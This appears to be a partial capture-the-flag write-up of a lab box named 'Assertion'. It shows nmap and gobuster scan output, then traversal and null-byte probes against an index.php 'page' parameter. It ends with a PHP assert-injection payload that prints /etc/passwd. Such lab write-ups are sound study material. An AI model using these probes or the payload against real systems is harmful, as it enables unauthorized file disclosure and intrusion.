PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:ce:aa:cc:02:de:a5:a3:58:5d:da:2b:ef:54:07:f9 (RSA)
| 256 9d:3f:df:16:7a:e1:59:58:84:4a:e3:29:8f:44:87:8d (ECDSA)
|_ 256 87:b5:6f:f8:21:81:d3:3b:43:d0:40:81:c0:e3:69:89 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Assertion
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.94 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> <http://192.168.81.94/css/>]
/fonts (Status: 301) [Size: 314] [--> <http://192.168.81.94/fonts/>]
/img (Status: 301) [Size: 312] [--> <http://192.168.81.94/img/>]
/index.php (Status: 200) [Size: 36592]
/js (Status: 301) [Size: 311] [--> <http://192.168.81.94/js/>]
/pages (Status: 301) [Size: 314] [--> <http://192.168.81.94/pages/>]
/server-status (Status: 403) [Size: 278]
Tried LFI but It is not so easy like EASY boxes
Finally come to this stackoverflow and hacktricks savior of my life
This is assert LFI and this does the File Path Traversal
To start with the test, we have this website to test
<http://192.168.81.94/index.php?page=gallery>
First to get some idea of the directory traversal
<http://192.168.81.94/index.php?page=>.
This should throw some exception to determine whether should continue the LFI.
Then we continue to add Null Byte
<http://192.168.81.94/index.php?page=.%00>
And this throw another exception
And finally come to this stackoverflow https://security.stackexchange.com/questions/146757/cannot-figure-out-how-to-bypass-this-function-for-lfi
Turns out this is called Assert LFI and on hacktricks has some tricks on this
' and die(show_source('/etc/passwd')) or '
